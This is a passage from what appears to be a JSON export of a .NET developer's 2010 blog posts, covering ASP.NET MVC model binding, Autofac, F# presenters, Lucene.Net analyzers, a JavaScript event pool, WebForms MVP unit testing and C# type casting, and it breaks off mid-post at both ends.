that’s left is to get the data into the right type to be returned:\nvar value = bindingContext.ValueProvider.GetValue(bindingContext.ModelName).RawValue; result = implicitAssignment.Invoke(null, new object[] { value }); So we’re just dynamically invoking the implicit operator we found before, pass in the data we were provided and then return.\nAnd here’s the completed class:\npublic class ImplicitAssignmentBinder : IModelBinder { public object BindModel(ControllerContext controllerContext, ModelBindingContext bindingContext) { var implicitAssignment = bindingContext.ModelType.GetMethods(BindingFlags.Public | BindingFlags.DeclaredOnly | BindingFlags.Static) .Where(x => x.Name == "op_Implicit") .Where(x => bindingContext.ModelType.IsAssignableFrom(x.ReturnType)) .FirstOrDefault(); if (implicitAssignment == null) throw new ArgumentException(string.Format("The Implicit Assignment Binder was being applied to this request, but the target type was '{0}', which does not provide an implicit assignment operator.", bindingContext.ModelType)); var result = null as object; try { var value = bindingContext.ValueProvider.GetValue(bindingContext.ModelName).RawValue; result = implicitAssignment.Invoke(null, new object[] { value }); } catch (Exception ex) { var message = string.Format("An exception occurred when trying to convert the paramater named '{0}' to type '{1}'. 
{2}", bindingContext.ModelName, bindingContext.ModelType.Name, ex.Message ); throw new ArgumentException(message, ex); } return result; } } As you can see here I’ve got the error handling also included ;).\n", "id": "2010-06-14-aspnet-mvc-model-binding-with-implicit-operators" }, { "title": "Supporting ValueTypes in Autofac", "url": "https://www.aaron-powell.com/posts/2010-06-09-supporting-valuetypes-in-autofac/", "date": "Wed, 09 Jun 2010 00:00:00 +0000", "tags": [ "autofac", "c#" ], "description": "Autofac doesn't support injection of value types as properties, here's how to support it.", "content": "Today I had an interesting problem with Autofac in which I was registering an Enum that I wanted to inject into my different objects. Some of the injection was being done on the properties, as this is an ASP.NET project and I wanted to inject into are UserControls.\nBut when ever I was doing it, I wasn’t getting the registered value. My component registry was working file, if I manually tried to get it out it worked fine, but the property was not set!\nThis was getting really frustrating, so after a bit of debugging into the Autofac source I found that the problem was that during the wiring up there is a check of each property of the object to see if it is able to be injected. One of the conditions to ignore the property is whether it’s a ValueType.\nNow I’m not going to speculate about why it’s this way, I have a hunch but that’s beyond the scope of what I want to answer here, what I want to answer is the how to do it.\n##Working with Autofac events\nAutofac has a very nice feature of firing events during the component life cycle, for this we’ll use the OnActivating event which takes a delegate. The argument that gets passed into the method has all the data you could need to perform your changes to the object.\nWell here’s the delegate that you can use to inject ValueType properties:\n.OnActivating(x => { var instance = x.Instance; var instanceType = x.Instance.GetType(); var context = x.Context; foreach (Reflection.PropertyInfo property in instanceType.GetProperties(Reflection.BindingFlags.Public | Reflection.BindingFlags.Instance | Reflection.BindingFlags.SetProperty)) { var propertyType = property.PropertyType; //only look for ValueType's which are actually registered! if (propertyType.IsValueType && context.IsRegistered(propertyType)) { object propertyValue = context.Resolve(propertyType); property.SetValue(instance, propertyValue, null); } } }) Hopefully this will solve a problem if you come across it yourself.\n", "id": "2010-06-09-supporting-valuetypes-in-autofac" }, { "title": "Writing Presenters with F#", "url": "https://www.aaron-powell.com/posts/2010-05-30-writing-presenters-with-fsharp/", "date": "Sun, 30 May 2010 00:00:00 +0000", "tags": [ "webformsmvp", "f#", "fsharp" ], "description": "This may not be the best idea, but hey, why not, let's writing Presenters with F#!", "content": "Disclaimer: I’m not an F# developer, I’m really only just learning and having a bit of a play around.\n#What\nAfter a few beers the other day I had a great idea, why not write a demo of using WebForms MVP and F#. Sure, seems fun, seems crazy, seems like a silly idea! :P\nBut there was method in my (alcohol induced) madness, looking in F# as an option for development isn’t a bad idea. 
F# as a functional languages offers some advantages which can’t be achieved with a static language like C# or VB.NET, and since it does have some OO principles we can define types, use inheritance, all the stuff we can do with the other languages, so why can’t we use it in a web scope?\nI’m not the first people who’s tried using F# with ASP.NET, it’s more about applying it in a different manner, in the scope of the WebForms MVP.\nHey, if this really works why couldn’t you work with F# and Umbraco ;).\n#Getting Started\nFirst step is the need to create a F# Class library (I’m going to separate my UI into a standard C# web project for this):\nSo for this I’m going to create a very simple little Hello World demo, so for this I’m going to require 2 classes, I need a Presenter and a Model. Clear out the default files and next I make one called HelloWorldPresenter, it’s just a standard F# Script file. Then I create a separate one called HelloWorldModel.\nKeep in mind that the order of types does matter in F#, so since (as I’ve stated) the Model file is created 2nd it’ll appear in the project 2nd. You’ll need to move it up to above the other file so that the type does get created by the time we actually need it.\nLet’s define our types:\nnamespace WebFormsMvp.FSharp.Views.Models type HelloWorldModel = class val mutable private msg : string new() = { msg = "" } member self.Message with get() = self.msg and set (value) = self.msg <- value end So here I’m just defining a simple class with a string property which can be modified (hence the mutable keyword). It’s a very basic Model, it’s not really complex but it’ll give you the idea of what can be done.\nNext let’s make a Presenter:\nnamespace WebFormsMvp.FSharp.Presenters open WebFormsMvp open WebFormsMvp.FSharp.Views.Models open WebFormsMvp.FSharp.Wrapper type HelloWorldPresenter = class inherit PresenterBase<IView<HelloWorldModel>> new (view) as self = { inherit PresenterBase<IView<HelloWorldModel>>(view) } override self.OnLoad(sender, e) = self.View.Model.Message <- "Hello World!" override self.ReleaseView() = ()\tend First we need to import and few namespaces, we need the WebFormsMvp namespace, the namespace for my Model class, and I’ve also imported the namespace of a base class which I’ve made to help. For some reason (most likely my lack of knowledge around F#) I was getting a compile error when creating the event handler, you should be able to do this in the constructor:\nself.View.Load.Add(fun (sender:obj) (args:EventArgs) -> self.View.Model.Message <- "Hello World!") But as I said, that was creating a compile error so I created a base class (in C#) which assigned the event handler for me which I can then override.\nThat aside we can use the base class method to write to the Model.Message property, which ultimately, is what we want to do.\nAll that’s left is that we need to create a C# Web Application Project and start the final implementation. Let’s see how that looks:\nusing WebFormsMvp; using WebFormsMvp.FSharp.Presenters; using WebFormsMvp.FSharp.Views.Models; using WebFormsMvp.Web; namespace WebformsMvp.FShap.Web.UserControls { [PresenterBinding(typeof(HelloWorldPresenter))] public partial class HelloWorld : MvpUserControl<HelloWorldModel>, IView<HelloWorldModel> { } } It looks exactly like the HelloWorldPresenter came from any other language class library!\nIt just works like you’d expect it to.\n##Now What?\nWell this was really just a thought experiment, looking at how we could be a bit unconventional in your development approach. 
Whether or not this is viable in a real-world scenario is a matter of perspective. Currently for me it’s not viable, but that’s really because I don’t have much in the way of F# skills.\nIf you were an F# developer this is an easy way to go about integrating F# into an ASP.NET Web Forms application, and in a unit-testable manner.\n", "id": "2010-05-30-writing-presenters-with-fsharp" }, { "title": "Analyzers in Lucene.Net", "url": "https://www.aaron-powell.com/posts/2010-05-27-lucene-analyzer/", "date": "Thu, 27 May 2010 00:00:00 +0000", "tags": [ "lucene.net", "c#", ".net", "examine", "umbraco-examine" ], "description": "", "content": "What is an Analyzer?## When you want to insert data into a Lucene index, or when you want to get the data back out of the index you will need to use an Analyzer to do this.\nLucene ships with many different Analyzers and picking the right one really comes down to the needs of your implementation. There are ones for working with different languages, ones which determine how words are treated (and which words to be ignored) or how whitespace is handled.\nBecause Analyzers are used for both indexing and searching you can use different ones for each operation if you want. It’s not generally best practice to use different Analyzers, if you do you may have terms handled differently. If you used a WhitespaceAnalyzer when you do your indexing but a StopAnalyzer for retrieval although the word “and” is fine for indexing it wont be found when searching.\nCommon Analyzers## Not all of the Analyzers are useful in common scenarios, hopefully this will help you work out which one to use for your scenarios.\nKeyword Analyzer### This Analyzer will treat the string as a single search term, so if you needed to handle say a product name (which has spaces in it) as a single search term then this is likely the one you want. It doesn’t concern itself with stop words or anything of the like, but it’s not really that good if you’ve got a large block of text that you want to insert into the index.\nStop Analyzer & Standard Analyzer### These are the most common Analyzers you’ll come across when working with Lucene, in fact the StandardAnalyzer is the default one which is used within Examine (you can specify in the config the Analyzer for both indexing and searching though).\nThe StandardAnalyzer actually combines parts of the StopAnalyzer, StandardFilter & LowerCaseFilter. The StandardAnalyzer understands English punctuation for breaking down words (hyphens, etc), words to ignore (via the StopAnalyzer) and technically case insensitive searching (by doing lowercase comparisons).\nThe StopAnalyzer (which is kind of a lesser version of the StandardAnalyzer) understands standard English words to ignore. This actually got me unstuck at one point, I was trying to search on the letter A in a field (which only contained a single letter) and any match with the letter A was being ignored. 
This is because the following list of words are skipped over by the Analyzer:\n"a", "an", "and", "are", "as", "at", "be", "but", "by", "for", "if", "in", "into", "is", "it", "no", "not", "of", "on", "or", "such", "that", "the", "their", "then", "there", "these", "they", "this", "to", "was", "will", "with" So if I was to search on this world rocks then I’d only have matches on world or rocks, the word this is ignored.\nWhitespace Analyzer### The WhitespaceAnalyzer is also a bit of a sub-set of the StandardAnalyzer, where it understands word breaks in English text, based on spaces and line breaks.\nThis Analyzer is great if you want to search on any English word, it doesn’t ignore stop words so you can search on a or the if required. This was how I got around the problem I described above.\nConclusion## Understanding Analyzers can be a tricky aspect of Lucene, and it can be the cause of some grief if they are not properly handled.\nThe general rule of the thumb is that the StandardAnalyzer will do what you require, giving you well structured results and filter out irrelevant English language words, but the other main Analyzers will help filter down results based in your requirements.\nAnd if you feel like getting really crazy (or you’re dealing with non-English content) there are plenty of other Analyzers within Lucene you can look int.\n", "id": "2010-05-27-lucene-analyzer" }, { "title": "Client Event Pool", "url": "https://www.aaron-powell.com/posts/2010-05-23-client-event-pool/", "date": "Sun, 23 May 2010 00:00:00 +0000", "tags": [ "javascript", "ajax", "ms-ajax" ], "description": "Client event pools are great to have disconnected AJAX components on a page", "content": "I read an article last year about implementing a Client Event Pool and I really liked the concept. Joel shows a very good way to use it but I’ve been doing my best to find a logical use for it myself.\nAnyone not familiar with the concept of a Client Event Pool it’s covered in Joel’s post, but the short version is that a Client Event Pool is a browser-level event handler which is designed to allow events to be easily passed between unlinked components. One component can raise an event which can be chosen to be handled by any other. Inversely events can be listened for even if the component isn’t on the page or the event isn’t used.\nThis isn’t really a new concept, you can achieve it (to a certain extent) with standard ASP.NET, with the OnClient<EventName> which is on a lot of the standard ASP.NET controls.\nAnd in this article I’m going to look at how to integrate a Client Event Pool with the ASP.NET AJAX Control Toolkit’s Modal Popup. Now, don’t get me wrong, this isn’t the only way to add the events to a modal popup control, there are a lot of event handlers which can be added without a Client Event Pool.\nThis all came about when I was tasked with integrating a login, forgotten password and change password component. Each were their own modal popups and each were separate .NET UserControls. I wasn’t involved with developing any of them, and I didn’t want to really do much to modify any of them too much and introduce more bugs in the system by screwing around with stuff I’m not familiar with. Because they are all separate I didn’t have a real way to pass the ID of the control that was to make the popup appear. 
Oh, and to make thing more complicated there were 2 links for each popup, sadly the Modal Popup doesn’t support multiple controls to do the popping-up (or as far as I’m aware…)\nI also didn’t want each of the popups to overlay each other, it doesn’t really look that good (as I’ll show shortly), so I needed a way to hide the master popup when the child was shown, and then when the child was hidden I want the master to reappear.\nSo I’m doing 3 basic controls for my example, a Login control:\nFull size\na Forgotten Password control:\nFull size\na Registration control:\nFull size\nAnd add a dash of CSS and you get a lovely little popup:\n(Ok, so my design skills aren’t great!)\nSo now it’s time to tie up the master control with the child controls. To do this I’m going to have 2 events raised from the child controls, one for when the popup is shown and one for when it is hidden. I’m also going to have an event which can be raised elsewhere on each child control which will initiate the showing of the popup (you could add one for the hiding, but I’m using the inbuilt hiding from the CancelControlID property of the modal popup).\nFor each they will look as follows:\nFull size\nLets have a look at how they work, first off I locate the the Sys.Component instance of the ModalPopup control. There are showing and hiding events fired off from the ModalPopup, so I’m going to add a handler, the handler though will just be a stub which in-turn raises an event within our Client Event Pool. I’ve given them names which will indicate what they are used for. Lastly I’m going to add an event handler so anyone can raise an event which will show the popup.\nNow lets have a look in the Login control:\nFull size\nThe first 2 lines of this is adding event handlers to the links on the control. All they do is tell the Client Event Pool to raise an event, an event which I previously set up to be consumed by the child controls.\nNext we set up the Client Event Pool to listen for the hide and show events from our child controls. It listens for the events to be raised and when they are it’ll either hide or show the modal on the current page. Admittedly I’ve gone a little bit overboard with my events between the two child controls. Each could just raise events like hideParent and showParent, and then I would only need 2 handlers against the Client Event Pool, but to illistrate my point I’ve gone the verbos method.\nNow I’ve gone for having the popups showing like this:\nTo this:\nAdmittedly static images can’t really show how it works, but it’s much nicer to not overlay popups, and ability to having popups automatically hiding and showing the loss-of-focus ones is a really sweet idea.\nI’ll admit that it’s possible to do this without the need for a Client Event Pool, you can expose all the appropriate properties on the child controls which then can be set appropriately within it’s parent, but think of it a step further, if you wanted a link on the Forgot Password to the Registration page. Because they aren’t really aware of each other it is very difficult to achieve (but not impossible). 
Your UserControl can also expose wrappers to the Showing and Hiding client events on the modal popup, but it still has the same problem as mentioned previously.\nAnd there we have it, a nice little example of how to use a Client Event Pool to make it easier to link previously unlinked components in a soft way.\nThe source code for this article can be found here.\nFramework agnostic So in the above demo I’ve shown how to play around with it if you’re using MS Ajax, but not every site we build will have MS Ajax as part of it.\nI was recently doing a build where I wanted to use the event pool concept, but didn’t want to use MS Ajax. So I set about simulating the concept in a framework agnostic way.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 EventManager = (function() { var events = {}; var getEvent = function(id) { if (!events[id]) { events[id] = []; } return events[id]; }; return { bind: function(name, fn) { var e = getEvent(name); e.push(fn); }, trigger: function(name, source, args) { var evt = getEvent(name); if (!evt || evt.length === 0) return null; evt = evt.length === 1 ? [evt[0]] : Array.apply(null, evt); for (var i = 0, l = evt.length; i < l; i++) { if (args.constructor !== Array) args = [args]; evt[i].apply(source, args); } } }; })(); This will create a global EventManager object (which sits at the window level) which has a bind and trigger event (which is the naming convention used by jQuery).\nYou bind to EventManager an event name you want to listen for, like so:\n1 2 3 EventManager.bind("hideParent", function(args) { /* do stuff */ }); The args property is actually an array of all the arguments passed into the method by the trigger method, which is used like so:\n1 EventManager.trigger("hideParent", this, { Hello: "World" }); args can really be anything, from an object to an array, but I like to use single objects when passing around. 
You also need to pass in an object into the 2nd parameter which defines what will be used for the this scope of the event handlers which are triggered.\nConclusion Hopefully this has been a bit of fun looking at how you can use MS Ajax or a generic implementation of a client event pool to have disconnected AJAX functionality.\n", "id": "2010-05-23-client-event-pool" }, { "title": "ASP.NET WebForms Model-Video-Presenter", "url": "https://www.aaron-powell.com/posts/2010-05-18-webforms-mvp/", "date": "Tue, 18 May 2010 00:00:00 +0000", "tags": [ "asp.net", "webforms-mvp" ], "description": "Articles, links and helpful tidbits for working with Webforms MVP", "content": "ASP.NET WebForms MVP is a really handy project which aims to bring testability to WebForms development.\n##WebForms MVP Contrib\nA look at the ASP.NET WebForms MVP Contrib project ##Useful Hits\nTesting messaging within a presenter Unit Testing with Umbraco ##Fun Stuff\nWriting Presenters with F#\n", "id": "2010-05-18-webforms-mvp" }, { "title": "Testing Messaging Within a Presenter", "url": "https://www.aaron-powell.com/posts/2010-05-18-testing-messaging-within-a-presenter/", "date": "Tue, 18 May 2010 00:00:00 +0000", "tags": [ "asp.net", "webforms-mvp" ], "description": "Cross-Presenter messaging is really handy, and here's how to do testing of it when it's in a presenter", "content": "Cross-Presenter messaging is a great way which you can have two presenters which don’t know about each other, but may have a reliance on data from the other.\nThere’s a good demo up on the WebForms MVP wiki which shows how it can be implemented.\nOne really handy feature of this is that you can have something happen when the message never arrives. Lets say for example we have a presenter which shows a set of promotions pulled from a global store. But I also want the ability to set the promotions on a per-page basis. 
So if there’s no promo’s for this page I want to see the global ones.\n##Setup##\nI’ll have my promotions presenter like this:\npublic class PromoPresenter : Presenter<IView<PromoModel>> { private IPromoService service; public PromoPresenter(IView<PromoModel> view, IPromoService service) : base(view) { this.service = service; this.View.Load += View_Load; } void View_Load(object sender, EventArgs e) { //TODO } public void ReleaseView() { this.View.Load -= View_Load; } } Now I need to add some functionality to the View_Load method so that it loads in from either the messages or not (ignore the implementation of IPromoService, it’s not important for this demo).\nvoid View_Load(object sender, EventArgs e) { Messages.Subscribe<IEnumerable<IPromo>>(promos => this.View.Model.Promos = promos, () => this.View.Model.Promos = this.service.GetGlobalPromos()); } So we also need a PagePresenter which may have promo boxes that are in-context to display.\npublic class PagePresenter : Presenter<IView<PageModel>> { private IContentService service; public PagePresenter(IView<PageModel> view, IContentService service) : base(view) { this.service = service; this.View.Load += View_Load; } void View_Load(object sender, EventArgs e) { var page = this.service.CurrentPage(); //set some model stuff about the page Messages.Publish<IEnumerable<IPromo>>(page.Promotions); } public void ReleaseView() { this.View.Load -= View_Load; } } ##Unit Testing##\nThis is pretty simple, and it should just work, but I’m a good developer, so how do I setup the unit tests to ensure that the right methods are called?\nWe need to simulate the underlying MessageBus of WebForms MVP, but that’s nothing you need to worry about when working with WebForms MVP, it does that on our behalf.\nAnd this is a situation I found myself in, I wanted to test both the message received and message not received functionality. So I started off looking into the source for WebForms MVP, they have tests kind of doing what I wanted, but not the full end-to-end which I required.\nSo let’s look at how to do it:\nA few assumptions, I’m using MS Test and RhinoMocks\n[TestMethod] public void PromoPresenterTests_From_Service_When_No_Message_Published() { //Arrange var view = MockRepository.GenerateStub<IView<PromoModel>>(); view.Model = new PromoModel(); var service = MockRepository.GenerateMock<IContentService>(); service.Expect(x => x.GetGlobalPromos()).Return(MockRepository.CreateStub<IEnumerable<IPromo>>()); var presenter = new PromoPresenter(view, service); var messageCoordinator = new MessageCoordinator(); presenter.Messages = messageCoordinator; //Act view.Raise(x => x.Load += null, null, null); presenter.ReleaseView(); messageCoordinator.Close(); //Assert Assert.IsNotNull(view.Model.Promos); service.VerifyAllExpectations(); } There’s not much different I’d have done if it was just a standard WebForms MVP test (or any other test for that matter) but I’m putting an expectation of my IContentService that I am calling the GetGlobalPromos method. What comes back is not important, just that something comes back.\nNext you need to setup a MessageCoordinator. This is what is responsible for the MessageBus, handling the publishing and subscription of the events.\nYou can either make a mock version if you want to be really explicit and set an expectation on the Messages.Subscribe call, but I’m not wanting that. I’ll just use the MessageCoordinator class which comes from WebForms MVP itself. 
This also means that I’m getting it to operate pretty much the same as if it was really running.\nSince this test is verifying the no messages published operation I just want to close the MessageCoordinator as soon as I’ve raised the View.Load event (which is where the subscription happens).\nNext we’ll test that Messages.Publish works like we expect it to:\n[TestMethod] public void PromoPresenterTests_No_Service_When_Published() { //Arrange var view = MockRepository.GenerateStub<IView<PromoModel>>(); view.Model = new PromoModel(); var service = MockRepository.GenerateMock<IPromoService>(); var presenter = new PromoPresenter(view, service); var messageCoordinator = new MessageCoordinator(); presenter.Messages = messageCoordinator; //Act view.Raise(x => x.Load += null, null, null); presenter.ReleaseView(); messageCoordinator.Publish(MockRepository.GenerateStub<IEnumerable<IPromo>>()); messageCoordinator.Close(); //Assert Assert.IsNotNull(view.Model.Promos); service.AssertWasNotCalled(x => x.GetGlobalPromos()); } This test is basically the same as the last one, but instead of setting an expectation on the GetGlobalPromos method I’m putting an AssertWasNotCalled on it, which is an extension method from RhinoMocks.\nAlso, we’re doing a Publish via our MessageCoordinator, before we close it off, which is how we would expect it to run in the web implementation (yes, you could set up an expectation on your mock objects if you want to go deeply into it).\n###PagePresenter?###\nYou’ll notice that the tests here are only covering the PromoPresenter, not the PagePresenter. Well to do a full test you would need something like this:\n[TestMethod] public void PromoPresenterTests_Published_From_Other_Presenter() { //Arrange var promoView = MockRepository.GenerateStub<IView<PromoModel>>(); promoView.Model = new PromoModel(); var promoService = MockRepository.GenerateMock<IPromoService>(); var promoPresenter = new PromoPresenter(promoView, promoService); var messageCoordinator = new MessageCoordinator(); promoPresenter.Messages = messageCoordinator; var pageView = MockRepository.GenerateStub<IView<PageModel>>(); var page = MockRepository.GenerateStub<IPage>(); page.Stub(x => x.Promotions).Return(MockRepository.GenerateStub<IEnumerable<IPromo>>()); var contentService = MockRepository.GenerateMock<IContentService>(); contentService.Stub(x => x.CurrentPage()).Return(page); var pagePresenter = new PagePresenter(pageView, contentService); pagePresenter.Messages = messageCoordinator; //Act promoView.Raise(x => x.Load += null, null, null); pageView.Raise(x => x.Load += null, null, null); promoPresenter.ReleaseView(); pagePresenter.ReleaseView(); messageCoordinator.Close(); //Assert Assert.IsNotNull(promoView.Model.Promos); promoService.AssertWasNotCalled(x => x.GetGlobalPromos()); } Here we’re creating both presenters, using their views and raising their load events so that the Messages should be passed around correctly.\n##Conclusion##\nThe Messaging system of WebForms MVP is really powerful, and hopefully this has shown you how you can do your unit testing around it.\n", "id": "2010-05-18-testing-messaging-within-a-presenter" }, { "title": "2009, a year in review", "url": "https://www.aaron-powell.com/posts/2010-04-25-2009-a-year-in-review/", "date": "Sun, 25 Apr 2010 00:00:00 +0000", "tags": [ "year-review" ], "description": "", "content": "So a new decade is upon us and with 2009 wrapped up it’s time to look retrospectively at the year that was.\n2009 was the biggest year professionally that I’ve had, the whole year has been filled with new adventures into the development world.\nAt the start of the year I announced my first Open Source project, the 
Umbraco Interaction Layer (UIL) was ceasing development as I’d joined the Umbraco core development team.\nI had a lot of fun delving into LINQ in greater depth, like commenting on the difference between LINQ query syntax vs LINQ method syntax, then having more fun by writing a JavaScript LINQ implementation.\nNext I took up a pleasure of mine, doing bizarre coding, first with recursive anonymous self executing functions in JavaScript and then I wrote it in .NET too!\nAlso I was lucky enough to get invited to Code Garden 09 in Copenhagen, which was an awesome trip and a great chance to meet other Umbracians from around the world. One of the outcomes was the first AUSPAC webinar (with the 2nd coming in the new year). Also coming out of my Denmark trip was a new employment opportunity which saw me moving from my home town of Melbourne to Sydney to join Shannon at TheFARM.\nUmbraco managed to get out Umbraco 4.1 Beta 1 on time, although the schedule has since been revised (there will be more information coming shortly on this). And to celebrate the occasion I released a set of videos on using LINQ to Umbraco.\nThen to finish the year off I released a new Open Source project, ASP.NET Web Forms Model-View-Presenter Contrib.\nWhat a busy year! Hopefully 2010 can prove to be just as exciting :D\n", "id": "2010-04-25-2009-a-year-in-review" }, { "title": "Dealing with type-casting limitations", "url": "https://www.aaron-powell.com/posts/2010-04-25-dealing-with-type-casting-limitations/", "date": "Sun, 25 Apr 2010 00:00:00 +0000", "tags": [ ".net", "c#", "c#-4", "dynamic", "type-casting", "umbraco" ], "description": "Looking at a limitation with type casting in .NET 3.5 and how .NET 4.0 can help solve it.", "content": "Well this is the first post involving the .NET 4.0 framework, woo :D. It’s something I’ve had a problem with from within the abstract service layer which we use at TheFARM, and it’s a limitation of how you can do type casting within the .NET framework.\nThe way we use our service layer is to never return classes, we only return interfaces, so you can’t write a method which looks like this:\npublic IEnumerable<IProduct> GetProducts() { return ctx.Products.AsEnumerable(); } This will throw an exception, even if the class Product implements the IProduct interface. 
To achieve it you need to do this:\npublic IEnumerable<IProduct> GetProducts() { return ctx.Products.Cast<IProduct>(); } This is a bit of a pain if you’re doing complex type conversion though, particularly with our LINQ to Umbraco framework (not the actual LINQ to Umbraco framework coming in Umbraco 4.1).\nThe problem really came up when I decided I wanted to change from using a constructor which takes an XElement to an explicit operator, so you could write cleaner code like this:\npublic IEnumerable<IUmbEvent> GetEvents() { XElement xNode = UmbXmlLinqExtensions.GetNodeByXpath(EventContainerXPath); var eventData = xNode .UmbSelectNodes() //selects all descendant "node" nodes //selects nodes of a certain alias .UmbSelectNodesWhereNodeTypeAlias(EventNodeTypeAlias) //This does the object conversion .Select(x => (UmbEvent)x) //ensure we don't return events with no start date .Where(x => x.FromDate != DateTime.MinValue); return eventData.Cast<IUmbEvent>(); } Still we’re doing a Select and a Cast. Since I now have an explicit operator defined for doing the conversion between XElement and UmbEvent, I thought, why can’t I just do this:\npublic IEnumerable<IUmbEvent> GetEvents() { XElement xNode = UmbXmlLinqExtensions.GetNodeByXpath(EventContainerXPath); var eventData = xNode .UmbSelectNodes() //selects all descendant "node" nodes //selects nodes of a certain alias .UmbSelectNodesWhereNodeTypeAlias(EventNodeTypeAlias) //This does the object conversion .Cast<UmbEvent>() //ensure we don't return events with no start date .Where(x => x.FromDate != DateTime.MinValue); return eventData.Cast<IUmbEvent>().ToList(); } But alas that won’t work; due to the way the Cast method works it’s not possible, which is very annoying. So I can’t directly return a collection of types which implement the required interface, and I can’t use the Cast method to just do all the conversions, I have to write Select methods. This just means I have a bunch of code smell, it’s not really causing any problems, it’s just ugly. I do love some clean code, and this isn’t really it :(\nSo I thought, why not write my own extension method to do the casts, something that has a return statement like this:\nyield return (TInterface)(TType)item; Assuming that TType inherits TInterface, you can write generic constraints which handle that, but you will receive a compile error, as the compiler can’t confirm that the type of item implements an explicit operator to cast it to TType.\nDamn, looks like we can’t do it with .NET 3.5.\n##Enter the world of .NET 4.0##\nSo I decided to see if I can actually achieve it, no matter what was required, but I didn’t want the code to look too terrible.\nAs I’m sure you’re all aware .NET 4.0 is bringing in a new keyword, dynamic, which then in turn works with the DLR to do the runtime operation. 
And you know what, we can leverage the runtime feature to delay the conversion.\nLets have a look at the extension method, and then we’ll break it down:\npublic static IEnumerable<TInterface> AsType<TType, TInterface>(this IEnumerable source) where TInterface : class where TType : TInterface, new() { if (!typeof(TInterface).IsInterface) { throw new ArgumentException("TInterface must be an Interface type"); } foreach (var item in source) { dynamic d = item; yield return (TInterface)(TType)d; } } So I’ve got an extension method which has 3 types in it:\nType for the collection items Type of the class Type of the interface I’m doing a check of the TInterface type to make sure it is an Interface, if it’s not then we’d have a problem :P\nThe really exciting part is this:\nforeach (var item in source) { dynamic d = item; yield return (TInterface)(TType)d; } Here we enumerate through our collection, but turn each item into a dynamic version! This means we can then do the complete type conversion and delay its evaluation until runtime!\nWoo! Now I can have code like this:\nIEnumerable<int> numbers = Enumerable.Range(0, 10); IEnumerable<IMyType> casted = numbers.AsType<MyType, IMyType>(); Sweet, now I can make my service method like this:\npublic IEnumerable<IUmbEvent> GetEvents() { XElement xNode = UmbXmlLinqExtensions.GetNodeByXpath(EventContainerXPath); return xNode .UmbSelectNodes() //selects all descendant "node" nodes .AsType<UmbEvent, IUmbEvent>() .Where(x => x.FromDate != DateTime.MinValue); } So pretty, I’m much happier… well once I can get to use more .NET 4.0. Oh, and yes, there is a performance hit for this, since we’re using the DLR the conversion is evaluated at runtime, not compile time. It’s probably not huge (I didn’t do any performance testing), but just something to be kept in mind.\n", "id": "2010-04-25-dealing-with-type-casting-limitations" }, { "title": "Exception thrown when using XSLT extensions", "url": "https://www.aaron-powell.com/posts/2010-04-25-exception-thrown-when-using-xslt-extensions/", "date": "Sun, 25 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "xslt" ], "description": "A common problem when writing XSLT extensions", "content": "This is a question I was asked today but it’s also something which I have come across myself when creating XSLT extensions.\nHave you ever had this exception thrown?\nSystem.MissingMethodException: No parameterless constructor defined for this object.\nat System.RuntimeTypeHandle.CreateInstance(RuntimeType type, Boolean publicOnly, Boolean noCheck, Boolean& canBeCached, RuntimeMethodHandle& ctor, Boolean& bNeedSecurityCheck) at System.RuntimeType.CreateInstanceSlow(Boolean publicOnly, Boolean fillCache) at System.RuntimeType.CreateInstanceImpl(Boolean publicOnly, Boolean skipVisibilityChecks, Boolean fillCache) at System.Activator.CreateInstance(Type type, Boolean nonPublic) at umbraco.macro.GetXsltExtensions() at umbraco.macro.AddMacroXsltExtensions() at umbraco.presentation.webservices.codeEditorSave.SaveXslt(String fileName, String oldName, String fileContents, Boolean ignoreDebugging)\n(The complete stack trace may be different, it’s the thrown exception that should be of note)\nSo what causes this? 
Well Umbraco loads its XSLT extensions (from xsltExtensions.config) using Reflection, and it looks for a public default constructor, which is the constructor which takes no arguments.\nBasically if you’re writing a constructor for your XSLT extensions class you must make sure you have a default one too, so your extensions class must look like this at least:\npublic class MyXsltExtensions { public MyXsltExtensions() { } ... } If you’re not defining your own constructor though this isn’t a problem.\nI only came across this bug when I was trying to define the default constructor as private, attempting to do a very tight API design (not exposing constructors where I didn’t want them). Whoops!\n", "id": "2010-04-25-exception-thrown-when-using-xslt-extensions" }, { "title": "Handy extension method for null-coalescing", "url": "https://www.aaron-powell.com/posts/2010-04-25-handy-extension-method-for-null-coalesing/", "date": "Sun, 25 Apr 2010 00:00:00 +0000", "tags": [], "description": "", "content": "Today a colleague asked me a question:\n"How do you do a null-coalesce operator which will return a property of an object when not null?"\nIf you’re not familiar with the null coalesce operator it’s the ?? operator and it can be used for inline expressions when the test object is null.\nYou use it like so:\nstring test = null; Console.WriteLine(test ?? "The string was null"); So it either returns itself or it returns your value, but what if you want to return a property of the object, not the object itself? Well, you can’t use the ?? operator for that.\nBut never fear, extension methods are here! I wrote this quick little one for him:\npublic static TResult NullCoalese<TTarget, TResult>(this TTarget o, Func<TTarget, TResult> func, TResult whenNull) { return o == null ? whenNull : func(o); } Stick this in a namespace, maybe restrict the type of TTarget (or leave it as anything in .NET land, whatever takes your fancy, but if you don’t restrict it maybe don’t leave it in a common namespace!) and use it like this:\nstring test = null; Console.WriteLine(test.NullCoalese(x => x.ToUpper(), "Null was supplied")); Enjoy :).\n", "id": "2010-04-25-handy-extension-method-for-null-coalesing" }, { "title": "Oh woe is (Mobile)Me", "url": "https://www.aaron-powell.com/posts/2010-04-25-oh-woe-is-mobile-me/", "date": "Sun, 25 Apr 2010 00:00:00 +0000", "tags": [ "mobile-me", "fail" ], "description": "", "content": "Anyone who is (lucky enough to be) on my msn contact list (and signed in during my work hours) will have seen something curious happening over the past week since I returned back to work.\nFor those of you who aren’t, basically I was signing in and out constantly with a frequency of say every 10 minutes. This oddly made it surprisingly hard to hold a conversation with someone. But more problematic was that not only was msn dropping out but the whole internet was. You could hardly even achieve a successful Google search.\nAnd this wasn’t just a problem for me, but for everyone here at TheFARM.\nThe first assumption was that it was something wrong with our ISP, we’re not on a super fast internet connection, and no one had problems outside of work, so it seemed like a logical assumption… right?\nWell it turns out that when you assume you make an ass out of you and me (ha, see what I did there! :P). 
